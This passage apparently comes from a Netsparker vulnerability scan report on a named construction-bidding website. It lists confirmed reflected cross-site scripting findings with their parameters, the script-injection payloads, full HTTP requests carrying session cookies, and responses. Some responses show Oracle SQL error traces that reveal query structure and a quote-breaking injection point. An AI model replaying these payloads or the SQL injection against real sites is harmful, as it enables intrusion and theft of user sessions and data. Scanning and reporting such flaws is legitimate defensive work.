dynamic.intraframe.templates.components.SQLLoopComponent.includeInternal(SQLLoopComponent.java:91) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.components.IfComponent.includeInternal(IfComponent.java:126) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.components.SQLLoopComponent.includeInternal(SQLLoopComponent.java:110) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.Template.includeInternal(Template.java:86) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.Template.include(Template.java:59) at dynamic.intraframe.engine.BaseApplicationContext.handleTemplate(BaseApplicationContext.java:1024) at dynamic.intraframe.engine.BaseApplicationContext.handle(BaseApplicationContext.java:844) at dynamic.intraframe.engine.BaseServlet.service(BaseServlet.java:237) at javax.servlet.http.HttpServlet.service(HttpServlet.java:802) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:269) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:188) at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:213) at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:174) at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:127) at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:117) at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:108) at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:151) at org.apache.jk.server.JkCoyoteHandler.invoke(JkCoyoteHandler.java:200) at org.apache.jk.common.HandlerRequest.invoke(HandlerRequest.java:283) at org.apache.jk.common.ChannelSocket.invoke(ChannelSocket.java:773) at org.apache.jk.common.ChannelSocket.processConnection(ChannelSocket.java:703) at org.apache.jk.common.ChannelSocket$SocketConnection.runIt(ChannelSocket.java:895) at org.apache.tomcat.util.threads.ThreadPool$ControlRunnable.run(ThreadPool.java:689) at java.lang.Thread.run(Thread.java:619)</pre></font> <tr> <td colspan="3"> </td> </tr> <tr> <td width="14"> </td> <td colspan="2" width="230"> <span class="copyright">© 1999-2010 Quest Construction Data Network, LLC</span> </td> </tr> <tr> <td colspan="3" height="100%"> </td> </tr> </table> </td><!--BGP5--> <td class="body" width="100%" height="100%" valign="top"> <h3>SEARCH PROJECTS</h3> <form name="frmSearch" action="/qap/action/IPPprojectSearch" method="post"> <input type="hidden" name="SearchType" value="1"> <input type="hidden" name="SQL" value=""> <input type="hidden" name="provider" value="765295"> <input type="hidden" name="group" value="'"--></style></script><script>netsparker(0x000179)</script>"> <table width="590" border="0" cellspacing="0"> <tr> <td class="search_label" width="240">QuestCDN eBidDoc™ Number</td> <td class="search_label" width="240">Password (If Required)</td> <td width="100" class="bodygrn-bold"> </td> </tr> <tr> <td><input type="text" value="0" name="ProjectNo" size="23" style="font-family: Courier; font-size:14px" value=""></td> <td><input type="password" name="password" size="20" style="font-family: Courier; font-size:14px"></td> <td><a href="#" onclick="document.frmSearch.submit(); return false;">Search</a></td> </tr> <tr> <td colspan="2" class="body"> <table border="0" cellspacing="0" cellpadding="0" class="body"> <tr> <td style="line-height:5px"> </td> </tr> <tr> <td> Using the <b>QuestCDN eBidDoc™ Number</b> to access the project advertisement and plan documents is an easy task. Just enter the specific <b>QuestCDN eBidDoc™ Number</b> in the eBidDoc field above and click the 'Search' button. This will take you directly to the full text advertisement for that project. Don't forget to enter the password if you are trying to access a protected or hidden project! </td> </tr> </table> </td> </tr> </table> </td> </tr> </table> </td></tr><tr> <td></ipp/includes/ipp_coon_rapids_footer.html> </td></tr></table></body></html>
|
- /qap/action/IPPshowProjData'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000193)%3C/script%3E
/qap/action/IPPshowProjData'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000193)%3C/script%3E CONFIRMED |
Parameters
| Parameter | Type | Value |
| jobCategoryNo | GET | 324403 |
| group | GET | 11 |
| provider | GET | 453856 |
| sortType | GET | 0 |
| jobNo | GET | 1464405 |
| URI-BASED | Raw URI | '"--></style></script><script>alert(0x000193)</script> |
Request
GET /qap/action/IPPshowProjData'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000193)%3C/script%3E HTTP/1.1
Referer: http://qap.questcdn.com/qap/projects/prj_browse/ipp_prj_browse.html?group=11&provider=765295
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: qap.questcdn.com
Cookie: sessionIdentifier=/177428174825690686
Accept-Encoding: gzip, deflate
Referer: http://qap.questcdn.com/qap/projects/prj_browse/ipp_prj_browse.html?group=11&provider=765295
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: qap.questcdn.com
Cookie: sessionIdentifier=/177428174825690686
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Date: Tue, 01 Mar 2011 20:03:10 GMT
Server: Apache/2.2.4 (Ubuntu) mod_jk/1.2.23 mod_ssl/2.2.4 OpenSSL/0.9.8e PHP/5.2.3-1ubuntu6
Set-Cookie: sessionIdentifier=/177428174825690686; Expires=Thu, 03-Mar-2011 20:03:11 GMT; Path=/qap
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 345
Content-Type: text/html;charset=utf-8
<html><body onload="location.replace('/qap/action/IPPshowProjData'"--></style></script><script>netsparker(0x000193)</script>?xreferrer='+escape(document.referrer))"><h1>Not Found</h1><br>The requested URL /qap/action/IPPshowProjData'"--></style></script><script>netsparker(0x000193)</script> was not found on this server.<br></body></html>
Date: Tue, 01 Mar 2011 20:03:10 GMT
Server: Apache/2.2.4 (Ubuntu) mod_jk/1.2.23 mod_ssl/2.2.4 OpenSSL/0.9.8e PHP/5.2.3-1ubuntu6
Set-Cookie: sessionIdentifier=/177428174825690686; Expires=Thu, 03-Mar-2011 20:03:11 GMT; Path=/qap
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 345
Content-Type: text/html;charset=utf-8
<html><body onload="location.replace('/qap/action/IPPshowProjData'"--></style></script><script>netsparker(0x000193)</script>?xreferrer='+escape(document.referrer))"><h1>Not Found</h1><br>The requested URL /qap/action/IPPshowProjData'"--></style></script><script>netsparker(0x000193)</script> was not found on this server.<br></body></html>
|
- /qap/projects/prj_browse/ipp_prj_view.html
/qap/projects/prj_browse/ipp_prj_view.html CONFIRMED |
Parameters
| Parameter | Type | Value |
| current_sub_tab | GET | view_projects |
| group | GET | '"--></style></script><script>alert(0x000197)</script> |
| provider | GET | 765295 |
Request
GET /qap/projects/prj_browse/ipp_prj_view.html?current_sub_tab=view_projects&group='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000197)%3C/script%3E&provider=765295 HTTP/1.1
Referer: http://qap.questcdn.com/qap/projects/prj_browse/ipp_prj_browse.html?group=11&provider=765295
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: qap.questcdn.com
Cookie: sessionIdentifier=/177428174825690686
Accept-Encoding: gzip, deflate
Referer: http://qap.questcdn.com/qap/projects/prj_browse/ipp_prj_browse.html?group=11&provider=765295
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: qap.questcdn.com
Cookie: sessionIdentifier=/177428174825690686
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Date: Tue, 01 Mar 2011 20:03:10 GMT
Server: Apache/2.2.4 (Ubuntu) mod_jk/1.2.23 mod_ssl/2.2.4 OpenSSL/0.9.8e PHP/5.2.3-1ubuntu6
Set-Cookie: sessionIdentifier=/177428174825690686; Expires=Thu, 03-Mar-2011 20:03:11 GMT; Path=/qap
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 7906
Content-Type: text/html;charset=utf-8
<script language="javascript1.1">function DownloadBidTab(sjobNbr){ req_window = window.open ("/qap/projects/prj_browse/prj_download_bid_tab.html?job_no=" + sjobNbr,"","height=300,width=500");}function ShowViewResults(jobPK){ var w = window.open('/qap/projects/prj_browse/ipp_prj_view.html?ShowProjectDetails=TRUE&viewOnly=TRUE&group='"--></style></script><script>netsparker(0x000197)</script>&provider=765295&jobPK=' + jobPK, 'ViewResults', 'status,resizable,scrollbars,width=700,height=600'); w.focus();}function PrintPage(){ window.print();}</script><html><head><meta http-equiv="content-type" content="text/html;charset=ISO-8859-1"><title>Bartlett & West - Projects</title><link href="/qap//includes/ipp_bartlett_west.css" rel="stylesheet" media="screen"></head><body><table class="container" cellpadding="0" cellspacing="0" width="100%" height="100%"><tr> <td><img src="/qap/images/bartlett_west.jpg" alt="Bartlett West"> </td></tr><tr> <td> <table class="menubar" cellpadding="0" cellspacing="0" width="100%"> <tr> <td class="menu_button" width="150"> <a href="/qap/projects/prj_browse/ipp_prj_browse.html?group=%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x000197%29%3C%2Fscript%3E&provider=765295" >Browse Projects</a> </td> <td class="menu_button" width="150"> <a href="/qap/projects/prj_browse/ipp_prj_view.html?current_sub_tab=view_projects&group=%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x000197%29%3C%2Fscript%3E&provider=765295" ><font color=red size=2 >Project Results</font></a> </td> <td> </td> </tr> </table> </td></tr><tr> <td width="100%" height="100%"> <table width="100%" height="100%" cellpadding="0" cellspacing="0"> <tr> <td class="results_tree" width="275" height="100%" valign="top"> <table width="244" height="100%" border="0" cellspacing="0" cellpadding="0"> <tr height="20"> <td width="10"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="10" border="0"></td> <td width="40"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="20" border="0"></td> <td width="170"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="210" border="0"></td> </tr> <font color="#FF0000">2011/03/01 14:03:11.578 [ 1] (TP-Processor1867) Problem including template component SQLLOOP query=" SELECT j.job_no, DECODE(j.bid_date, null, null, to_char(j.bid_date,'MM/DD/YYYY')), j.name FROM jobs j WHERE j.job_no in ( SELECT DISTINCT j.job_no FROM jobs j, plan_holders ph, provider_group pg WHERE j.job_no = ph.job_no (+) AND (ph.bid_amount IS NOT NULL or j.bid_tab_file_name is not null) AND ( j.provider_account_no = pg.provider_no OR j.q_ipp_owner = pg.provider_no ) AND pg.provider_group_no=<?p:group?>) ORDER BY j.bid_date asc " name="Projects"<pre><a href="http://java.sun.com/products/jdk/1.2/docs/api/java/sql/SQLException.html" target="new">java.sql.SQLException</a>: ORA-01756: quoted string not properly terminated while executing: SELECT j.job_no, DECODE(j.bid_date, null, null, to_char(j.bid_date,'MM/DD/YYYY')), j.name FROM jobs j WHERE j.job_no in ( SELECT DISTINCT j.job_no FROM jobs j, plan_holders ph, provider_group pg WHERE j.job_no = ph.job_no (+) AND (ph.bid_amount IS NOT NULL or j.bid_tab_file_name is not null) AND ( j.provider_account_no = pg.provider_no OR j.q_ipp_owner = pg.provider_no ) AND pg.provider_group_no='"--></style></script><script>netsparker(0x000197)</script>) ORDER BY j.bid_date asc at oracle.jdbc.dbaccess.DBError.throwSqlException(DBError.java:134) at oracle.jdbc.ttc7.TTIoer.processError(TTIoer.java:289) at oracle.jdbc.ttc7.Oall7.receive(Oall7.java:573) at oracle.jdbc.ttc7.TTC7Protocol.doOall7(TTC7Protocol.java:1891) at oracle.jdbc.ttc7.TTC7Protocol.parseExecuteDescribe(TTC7Protocol.java:830) at oracle.jdbc.driver.OracleStatement.doExecuteQuery(OracleStatement.java:2391) at oracle.jdbc.driver.OracleStatement.doExecuteWithTimeout(OracleStatement.java:2672) at oracle.jdbc.driver.OracleStatement.executeQuery(OracleStatement.java:572) at dynamic.dbtk.connection.ConnectionWrapper.select(ConnectionWrapper.java:531) at dynamic.dbtk.connection.ConnectionWrapper.select(ConnectionWrapper.java:622) at dynamic.intraframe.templates.components.SQLLoopComponent.includeInternal(SQLLoopComponent.java:91) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.components.IfComponent.includeInternal(IfComponent.java:126) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.components.SQLLoopComponent.includeInternal(SQLLoopComponent.java:110) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.Template.includeInternal(Template.java:86) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.Template.include(Template.java:59) at dynamic.intraframe.engine.BaseApplicationContext.handleTemplate(BaseApplicationContext.java:1024) at dynamic.intraframe.engine.BaseApplicationContext.handle(BaseApplicationContext.java:844) at dynamic.intraframe.engine.BaseServlet.service(BaseServlet.java:237) at javax.servlet.http.HttpServlet.service(HttpServlet.java:802) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:269) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:188) at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:213) at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:174) at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:127) at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:117) at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:108) at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:151) at org.apache.jk.server.JkCoyoteHandler.invoke(JkCoyoteHandler.java:200) at org.apache.jk.common.HandlerRequest.invoke(HandlerRequest.java:283) at org.apache.jk.common.ChannelSocket.invoke(ChannelSocket.java:773) at org.apache.jk.common.ChannelSocket.processConnection(ChannelSocket.java:703) at org.apache.jk.common.ChannelSocket$SocketConnection.runIt(ChannelSocket.java:895) at org.apache.tomcat.util.threads.ThreadPool$ControlRunnable.run(ThreadPool.java:689) at java.lang.Thread.run(Thread.java:619)</pre></font> </table> </td> <td class="results_detail" valign="top" width="100%"> </td> </tr> </table> </td></tr></table></body></html>
Date: Tue, 01 Mar 2011 20:03:10 GMT
Server: Apache/2.2.4 (Ubuntu) mod_jk/1.2.23 mod_ssl/2.2.4 OpenSSL/0.9.8e PHP/5.2.3-1ubuntu6
Set-Cookie: sessionIdentifier=/177428174825690686; Expires=Thu, 03-Mar-2011 20:03:11 GMT; Path=/qap
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 7906
Content-Type: text/html;charset=utf-8
<script language="javascript1.1">function DownloadBidTab(sjobNbr){ req_window = window.open ("/qap/projects/prj_browse/prj_download_bid_tab.html?job_no=" + sjobNbr,"","height=300,width=500");}function ShowViewResults(jobPK){ var w = window.open('/qap/projects/prj_browse/ipp_prj_view.html?ShowProjectDetails=TRUE&viewOnly=TRUE&group='"--></style></script><script>netsparker(0x000197)</script>&provider=765295&jobPK=' + jobPK, 'ViewResults', 'status,resizable,scrollbars,width=700,height=600'); w.focus();}function PrintPage(){ window.print();}</script><html><head><meta http-equiv="content-type" content="text/html;charset=ISO-8859-1"><title>Bartlett & West - Projects</title><link href="/qap//includes/ipp_bartlett_west.css" rel="stylesheet" media="screen"></head><body><table class="container" cellpadding="0" cellspacing="0" width="100%" height="100%"><tr> <td><img src="/qap/images/bartlett_west.jpg" alt="Bartlett West"> </td></tr><tr> <td> <table class="menubar" cellpadding="0" cellspacing="0" width="100%"> <tr> <td class="menu_button" width="150"> <a href="/qap/projects/prj_browse/ipp_prj_browse.html?group=%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x000197%29%3C%2Fscript%3E&provider=765295" >Browse Projects</a> </td> <td class="menu_button" width="150"> <a href="/qap/projects/prj_browse/ipp_prj_view.html?current_sub_tab=view_projects&group=%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x000197%29%3C%2Fscript%3E&provider=765295" ><font color=red size=2 >Project Results</font></a> </td> <td> </td> </tr> </table> </td></tr><tr> <td width="100%" height="100%"> <table width="100%" height="100%" cellpadding="0" cellspacing="0"> <tr> <td class="results_tree" width="275" height="100%" valign="top"> <table width="244" height="100%" border="0" cellspacing="0" cellpadding="0"> <tr height="20"> <td width="10"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="10" border="0"></td> <td width="40"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="20" border="0"></td> <td width="170"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="210" border="0"></td> </tr> <font color="#FF0000">2011/03/01 14:03:11.578 [ 1] (TP-Processor1867) Problem including template component SQLLOOP query=" SELECT j.job_no, DECODE(j.bid_date, null, null, to_char(j.bid_date,'MM/DD/YYYY')), j.name FROM jobs j WHERE j.job_no in ( SELECT DISTINCT j.job_no FROM jobs j, plan_holders ph, provider_group pg WHERE j.job_no = ph.job_no (+) AND (ph.bid_amount IS NOT NULL or j.bid_tab_file_name is not null) AND ( j.provider_account_no = pg.provider_no OR j.q_ipp_owner = pg.provider_no ) AND pg.provider_group_no=<?p:group?>) ORDER BY j.bid_date asc " name="Projects"<pre><a href="http://java.sun.com/products/jdk/1.2/docs/api/java/sql/SQLException.html" target="new">java.sql.SQLException</a>: ORA-01756: quoted string not properly terminated while executing: SELECT j.job_no, DECODE(j.bid_date, null, null, to_char(j.bid_date,'MM/DD/YYYY')), j.name FROM jobs j WHERE j.job_no in ( SELECT DISTINCT j.job_no FROM jobs j, plan_holders ph, provider_group pg WHERE j.job_no = ph.job_no (+) AND (ph.bid_amount IS NOT NULL or j.bid_tab_file_name is not null) AND ( j.provider_account_no = pg.provider_no OR j.q_ipp_owner = pg.provider_no ) AND pg.provider_group_no='"--></style></script><script>netsparker(0x000197)</script>) ORDER BY j.bid_date asc at oracle.jdbc.dbaccess.DBError.throwSqlException(DBError.java:134) at oracle.jdbc.ttc7.TTIoer.processError(TTIoer.java:289) at oracle.jdbc.ttc7.Oall7.receive(Oall7.java:573) at oracle.jdbc.ttc7.TTC7Protocol.doOall7(TTC7Protocol.java:1891) at oracle.jdbc.ttc7.TTC7Protocol.parseExecuteDescribe(TTC7Protocol.java:830) at oracle.jdbc.driver.OracleStatement.doExecuteQuery(OracleStatement.java:2391) at oracle.jdbc.driver.OracleStatement.doExecuteWithTimeout(OracleStatement.java:2672) at oracle.jdbc.driver.OracleStatement.executeQuery(OracleStatement.java:572) at dynamic.dbtk.connection.ConnectionWrapper.select(ConnectionWrapper.java:531) at dynamic.dbtk.connection.ConnectionWrapper.select(ConnectionWrapper.java:622) at dynamic.intraframe.templates.components.SQLLoopComponent.includeInternal(SQLLoopComponent.java:91) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.components.IfComponent.includeInternal(IfComponent.java:126) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.components.SQLLoopComponent.includeInternal(SQLLoopComponent.java:110) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.Template.includeInternal(Template.java:86) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.Template.include(Template.java:59) at dynamic.intraframe.engine.BaseApplicationContext.handleTemplate(BaseApplicationContext.java:1024) at dynamic.intraframe.engine.BaseApplicationContext.handle(BaseApplicationContext.java:844) at dynamic.intraframe.engine.BaseServlet.service(BaseServlet.java:237) at javax.servlet.http.HttpServlet.service(HttpServlet.java:802) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:269) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:188) at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:213) at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:174) at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:127) at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:117) at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:108) at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:151) at org.apache.jk.server.JkCoyoteHandler.invoke(JkCoyoteHandler.java:200) at org.apache.jk.common.HandlerRequest.invoke(HandlerRequest.java:283) at org.apache.jk.common.ChannelSocket.invoke(ChannelSocket.java:773) at org.apache.jk.common.ChannelSocket.processConnection(ChannelSocket.java:703) at org.apache.jk.common.ChannelSocket$SocketConnection.runIt(ChannelSocket.java:895) at org.apache.tomcat.util.threads.ThreadPool$ControlRunnable.run(ThreadPool.java:689) at java.lang.Thread.run(Thread.java:619)</pre></font> </table> </td> <td class="results_detail" valign="top" width="100%"> </td> </tr> </table> </td></tr></table></body></html>
|
- /qap/projects/prj_browse/ipp_prj_view.html
/qap/projects/prj_browse/ipp_prj_view.html CONFIRMED |
Parameters
| Parameter | Type | Value |
| ShowProjectDetails | GET | TRUE |
| viewOnly | GET | TRUE |
| group | GET | '"--></style></script><script>alert(0x0001CD)</script> |
| provider | GET | 765295 |
| jobPK | GET | 3 |
Request
GET /qap/projects/prj_browse/ipp_prj_view.html?ShowProjectDetails=TRUE&viewOnly=TRUE&group='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001CD)%3C/script%3E&provider=765295&jobPK=3 HTTP/1.1
Referer: http://qap.questcdn.com/qap/projects/prj_browse/ipp_prj_view.html?current_sub_tab=view_projects&group=11&provider=765295
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: qap.questcdn.com
Cookie: sessionIdentifier=/177428174825690686
Accept-Encoding: gzip, deflate
Referer: http://qap.questcdn.com/qap/projects/prj_browse/ipp_prj_view.html?current_sub_tab=view_projects&group=11&provider=765295
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: qap.questcdn.com
Cookie: sessionIdentifier=/177428174825690686
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Date: Tue, 01 Mar 2011 20:03:24 GMT
Server: Apache/2.2.4 (Ubuntu) mod_jk/1.2.23 mod_ssl/2.2.4 OpenSSL/0.9.8e PHP/5.2.3-1ubuntu6
Set-Cookie: sessionIdentifier=/177428174825690686; Expires=Thu, 03-Mar-2011 20:03:24 GMT; Path=/qap
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 983
Content-Type: text/html;charset=utf-8
<script language="javascript1.1">function DownloadBidTab(sjobNbr){ req_window = window.open ("/qap/projects/prj_browse/prj_download_bid_tab.html?job_no=" + sjobNbr,"","height=300,width=500");}function ShowViewResults(jobPK){ var w = window.open('/qap/projects/prj_browse/ipp_prj_view.html?ShowProjectDetails=TRUE&viewOnly=TRUE&group='"--></style></script><script>netsparker(0x0001CD)</script>&provider=765295&jobPK=' + jobPK, 'ViewResults', 'status,resizable,scrollbars,width=700,height=600'); w.focus();}function PrintPage(){ window.print();}</script><html><head><meta http-equiv="content-type" content="text/html;charset=ISO-8859-1"><title>Bartlett & West - Results</title></head><body> Error. Please contact administrator. <!-- <tr style="height:10"> <td colspan="7"><span class="prj_data">No planholders found.</span></td> </tr> --> </td> </tr> </table></body></html>
Date: Tue, 01 Mar 2011 20:03:24 GMT
Server: Apache/2.2.4 (Ubuntu) mod_jk/1.2.23 mod_ssl/2.2.4 OpenSSL/0.9.8e PHP/5.2.3-1ubuntu6
Set-Cookie: sessionIdentifier=/177428174825690686; Expires=Thu, 03-Mar-2011 20:03:24 GMT; Path=/qap
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 983
Content-Type: text/html;charset=utf-8
<script language="javascript1.1">function DownloadBidTab(sjobNbr){ req_window = window.open ("/qap/projects/prj_browse/prj_download_bid_tab.html?job_no=" + sjobNbr,"","height=300,width=500");}function ShowViewResults(jobPK){ var w = window.open('/qap/projects/prj_browse/ipp_prj_view.html?ShowProjectDetails=TRUE&viewOnly=TRUE&group='"--></style></script><script>netsparker(0x0001CD)</script>&provider=765295&jobPK=' + jobPK, 'ViewResults', 'status,resizable,scrollbars,width=700,height=600'); w.focus();}function PrintPage(){ window.print();}</script><html><head><meta http-equiv="content-type" content="text/html;charset=ISO-8859-1"><title>Bartlett & West - Results</title></head><body> Error. Please contact administrator. <!-- <tr style="height:10"> <td colspan="7"><span class="prj_data">No planholders found.</span></td> </tr> --> </td> </tr> </table></body></html>
|
- /qap/projects/prj_browse/ipp_prj_view.html
/qap/projects/prj_browse/ipp_prj_view.html CONFIRMED |
Parameters
| Parameter | Type | Value |
| current_sub_tab | GET | view_projects |
| group | GET | '"--></style></script><script>alert(0x0001EB)</script> |
| provider | GET | 765295 |
| sortType | GET | 1 |
Request
GET /qap/projects/prj_browse/ipp_prj_view.html?current_sub_tab=view_projects&group='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001EB)%3C/script%3E&provider=765295&sortType=1 HTTP/1.1
Referer: http://qap.questcdn.com/qap/projects/prj_browse/ipp_prj_browse_letting_date.html?group=11&provider=765295
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: qap.questcdn.com
Cookie: sessionIdentifier=/177428174825690686
Accept-Encoding: gzip, deflate
Referer: http://qap.questcdn.com/qap/projects/prj_browse/ipp_prj_browse_letting_date.html?group=11&provider=765295
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: qap.questcdn.com
Cookie: sessionIdentifier=/177428174825690686
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Date: Tue, 01 Mar 2011 20:03:35 GMT
Server: Apache/2.2.4 (Ubuntu) mod_jk/1.2.23 mod_ssl/2.2.4 OpenSSL/0.9.8e PHP/5.2.3-1ubuntu6
Set-Cookie: sessionIdentifier=/177428174825690686; Expires=Thu, 03-Mar-2011 20:03:35 GMT; Path=/qap
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 7906
Content-Type: text/html;charset=utf-8
<script language="javascript1.1">function DownloadBidTab(sjobNbr){ req_window = window.open ("/qap/projects/prj_browse/prj_download_bid_tab.html?job_no=" + sjobNbr,"","height=300,width=500");}function ShowViewResults(jobPK){ var w = window.open('/qap/projects/prj_browse/ipp_prj_view.html?ShowProjectDetails=TRUE&viewOnly=TRUE&group='"--></style></script><script>netsparker(0x0001EB)</script>&provider=765295&jobPK=' + jobPK, 'ViewResults', 'status,resizable,scrollbars,width=700,height=600'); w.focus();}function PrintPage(){ window.print();}</script><html><head><meta http-equiv="content-type" content="text/html;charset=ISO-8859-1"><title>Bartlett & West - Projects</title><link href="/qap//includes/ipp_bartlett_west.css" rel="stylesheet" media="screen"></head><body><table class="container" cellpadding="0" cellspacing="0" width="100%" height="100%"><tr> <td><img src="/qap/images/bartlett_west.jpg" alt="Bartlett West"> </td></tr><tr> <td> <table class="menubar" cellpadding="0" cellspacing="0" width="100%"> <tr> <td class="menu_button" width="150"> <a href="/qap/projects/prj_browse/ipp_prj_browse.html?group=%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x0001EB%29%3C%2Fscript%3E&provider=765295" >Browse Projects</a> </td> <td class="menu_button" width="150"> <a href="/qap/projects/prj_browse/ipp_prj_view.html?current_sub_tab=view_projects&group=%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x0001EB%29%3C%2Fscript%3E&provider=765295" ><font color=red size=2 >Project Results</font></a> </td> <td> </td> </tr> </table> </td></tr><tr> <td width="100%" height="100%"> <table width="100%" height="100%" cellpadding="0" cellspacing="0"> <tr> <td class="results_tree" width="275" height="100%" valign="top"> <table width="244" height="100%" border="0" cellspacing="0" cellpadding="0"> <tr height="20"> <td width="10"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="10" border="0"></td> <td width="40"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="20" border="0"></td> <td width="170"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="210" border="0"></td> </tr> <font 